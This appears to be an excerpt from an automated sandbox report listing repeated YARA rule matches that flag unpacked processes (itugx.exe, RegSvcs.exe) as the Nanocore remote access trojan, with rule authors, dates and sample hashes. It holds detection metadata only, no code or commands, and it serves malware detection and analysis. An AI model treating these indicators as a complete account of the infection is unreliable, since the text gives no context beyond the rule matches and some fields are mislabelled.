      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
